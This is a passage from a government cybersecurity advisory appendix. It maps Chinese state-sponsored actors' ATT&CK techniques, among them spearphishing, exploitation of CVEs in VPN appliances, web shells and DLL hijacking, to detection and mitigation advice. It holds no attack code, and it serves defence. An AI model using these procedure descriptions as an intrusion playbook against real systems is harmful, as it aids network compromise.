Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse 